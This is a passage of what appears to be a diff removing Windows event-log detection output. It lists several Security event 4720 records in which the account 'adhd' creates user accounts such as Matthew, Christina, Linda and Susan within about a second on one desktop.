-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.2818397Z'/&gt;&lt;EventRecordID&gt;4987&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Matthew&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1157&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Matthew&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Matthew</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4981</recordid>
-            <time>2020-06-11 22:05:06.199175500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.1991755Z'/&gt;&lt;EventRecordID&gt;4981&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Christina&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1156&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Christina&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Christina</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4975</recordid>
-            <time>2020-06-11 22:05:06.76872300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.0768723Z'/&gt;&lt;EventRecordID&gt;4975&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Joan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1155&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Joan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Joan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4969</recordid>
-            <time>2020-06-11 22:05:05.990931400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.9909314Z'/&gt;&lt;EventRecordID&gt;4969&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Linda&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1154&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Linda&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Linda</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4963</recordid>
-            <time>2020-06-11 22:05:05.904823300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.9048233Z'/&gt;&lt;EventRecordID&gt;4963&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Tyler&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1153&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Tyler&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Tyler</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4957</recordid>
-            <time>2020-06-11 22:05:05.817214900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.8172149Z'/&gt;&lt;EventRecordID&gt;4957&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kathryn&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1152&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kathryn&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kathryn</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4951</recordid>
-            <time>2020-06-11 22:05:05.720882800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.7208828Z'/&gt;&lt;EventRecordID&gt;4951&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Andrea&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1151&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Andrea&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Andrea</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4945</recordid>
-            <time>2020-06-11 22:05:05.640094700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.6400947Z'/&gt;&lt;EventRecordID&gt;4945&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Susan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1150&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Susan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Susan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4939</recordid>
-            <time>2020-06-11 22:05:05.557826700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.5578267Z'/&gt;&lt;EventRecordID&gt;4939&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Elizabeth&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1149&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Elizabeth&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Elizabeth</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4933</recordid>
-            <time>2020-06-11 22:05:05.467816600Z</time>
-            <channel>Security</channel>
